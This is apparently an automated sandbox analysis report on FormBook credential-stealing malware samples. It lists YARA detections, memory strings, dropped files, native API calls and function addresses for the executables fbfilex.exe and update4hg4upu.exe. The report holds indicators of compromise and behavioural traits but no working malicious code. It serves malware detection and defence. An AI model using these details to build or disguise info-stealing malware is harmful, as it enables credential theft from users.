7f e0 bd 1f 67 8f 5b dd ad 97 fd c3 2d 27 fd 74 90 0b a9 d1 fb b6 6f b1 6e 79 df ad cb 9f 0e bf 39 b6 fb 79 28 43 69 8a 3f fd
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: fbfilex.exe, 00000001.00000002.196725370.0000000002E61000.00000004.00000001.sdmp, update4hg4upu.exe, 00000018.00000002.427976687.00000000027B1000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.220621635.000000000BA46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\msdt.exeDropped file: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\msdt.exeDropped file: C:\Users\user\AppData\Roaming\56NMRA12\56Nlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.439593285.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.update4hg4upu.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.update4hg4upu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fbfilex.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.fbfilex.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419CA0 NtCreateFile,3_2_00419CA0
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419D50 NtReadFile,3_2_00419D50
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419DD0 NtClose,3_2_00419DD0
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419E80 NtAllocateVirtualMemory,3_2_00419E80
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419D4A NtReadFile,3_2_00419D4A
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00419DCB NtClose,3_2_00419DCB
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419CA0 NtCreateFile,27_2_00419CA0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419D50 NtReadFile,27_2_00419D50
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419DD0 NtClose,27_2_00419DD0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419E80 NtAllocateVirtualMemory,27_2_00419E80
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419D4A NtReadFile,27_2_00419D4A
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00419DCB NtClose,27_2_00419DCB
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02C790F01_2_02C790F0
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02C79FB81_2_02C79FB8
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02C78FB91_2_02C78FB9
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D422281_2_02D42228
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D450901_2_02D45090
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D400401_2_02D40040
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D422231_2_02D42223
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D450831_2_02D45083
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D400331_2_02D40033
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D404201_2_02D40420
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D4251F1_2_02D4251F
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D425281_2_02D42528
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D41F401_2_02D41F40
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_02D41F331_2_02D41F33
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053ECD381_2_053ECD38
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E27101_2_053E2710
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E59301_2_053E5930
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053EF1B01_2_053EF1B0
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E30181_2_053E3018
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E50C01_2_053E50C0
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E63301_2_053E6330
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E72281_2_053E7228
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E8D201_2_053E8D20
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E8D101_2_053E8D10
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053EDD001_2_053EDD00
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E45761_2_053E4576
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053EA5901_2_053EA590
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E5DF81_2_053E5DF8
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E5DEB1_2_053E5DEB
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E44B91_2_053E44B9
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E44C81_2_053E44C8
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E17581_2_053E1758
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 1_2_053E174B1_2_053E174B
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041E0073_2_0041E007
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041E01E3_2_0041E01E
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041D9773_2_0041D977
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041D1883_2_0041D188
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00409DDA3_2_00409DDA
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041D66E3_2_0041D66E
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00409E1C3_2_00409E1C
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00409E203_2_00409E20
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_0041E76F3_2_0041E76F
          Source: C:\Users\user\Desktop\fbfilex.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_00C994D824_2_00C994D8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_0484521024_2_04845210
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048426A324_2_048426A3
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048426A824_2_048426A8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048407BF24_2_048407BF
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048407C024_2_048407C0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048420BB24_2_048420BB
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_048420C024_2_048420C0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_0484520324_2_04845203
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_0484433824_2_04844338
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDCD3824_2_04DDCD38
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDF7E824_2_04DDF7E8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD271024_2_04DD2710
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD50C024_2_04DD50C0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD301824_2_04DD3018
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDF1B024_2_04DDF1B0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD593024_2_04DD5930
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD722824_2_04DD7228
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD633024_2_04DD6330
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD44C824_2_04DD44C8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD44BB24_2_04DD44BB
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD5DF824_2_04DD5DF8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD5DF324_2_04DD5DF3
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD457624_2_04DD4576
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD8D1B24_2_04DD8D1B
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDDD0024_2_04DDDD00
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD8D2024_2_04DD8D20
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDA64824_2_04DDA648
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDA64724_2_04DDA647
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDE67824_2_04DDE678
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDD66024_2_04DDD660
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD961F24_2_04DD961F
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD962024_2_04DD9620
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD175824_2_04DD1758
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD175724_2_04DD1757
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD98B024_2_04DD98B0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD98AB24_2_04DD98AB
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD904024_2_04DD9040
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD301324_2_04DD3013
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DDD00024_2_04DDD000
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD903C24_2_04DD903C
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD502024_2_04DD5020
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD815024_2_04DD8150
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD814924_2_04DD8149
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD592B24_2_04DD592B
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD72D624_2_04DD72D6
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD9A7824_2_04DD9A78
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD9A7724_2_04DD9A77
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD722524_2_04DD7225
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD93EC24_2_04DD93EC
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD93E824_2_04DD93E8
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD735224_2_04DD7352
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD733524_2_04DD7335
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 24_2_04DD632324_2_04DD6323
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041E00727_2_0041E007
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041E01E27_2_0041E01E
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0040103027_2_00401030
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041D97727_2_0041D977
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041D18827_2_0041D188
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00409DDA27_2_00409DDA
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00402D9027_2_00402D90
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041D66E27_2_0041D66E
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00409E1C27_2_00409E1C
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00409E2027_2_00409E20
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_0041E76F27_2_0041E76F
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00402FB027_2_00402FB0
          Source: C:\Program Files (x86)\Kx2ad\update4hg4upu.exeCode function: 27_2_00AA918427_2_00AA9184
          Source: fbfilex.exe, 00000001.00000000.182646899.0000000000A60000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
          Source: fbfilex.exe, 00000001.00000002.196725370.0000000002E61000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWinRar.dll. vs fbfilex.exe
          Source: fbfilex.exe, 00000002.00000002.191530210.0000000000450000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
          Source: fbfilex.exe, 00000003.00000002.235411271.00000000030E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs fbfilex.exe
          Source: fbfilex.exe, 00000003.00000002.235242840.00000000016FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fbfilex.exe
          Source: fbfilex.exe, 00000003.00000002.234532557.0000000000A40000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
          Source: fbfilex.exeBinary or memory string: OriginalFilenameSw2.exe: vs fbfilex.exe
          Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001C.00000002.442201319.0000000003070000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.234170284.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001B.00000002.440439853.0000000001100000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.234761977.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000018.00000002.430047358.0000000003805000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.199494924.0000000003EB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.234705355.0000000000FA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001B.00000002.440517576.0000000001130000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
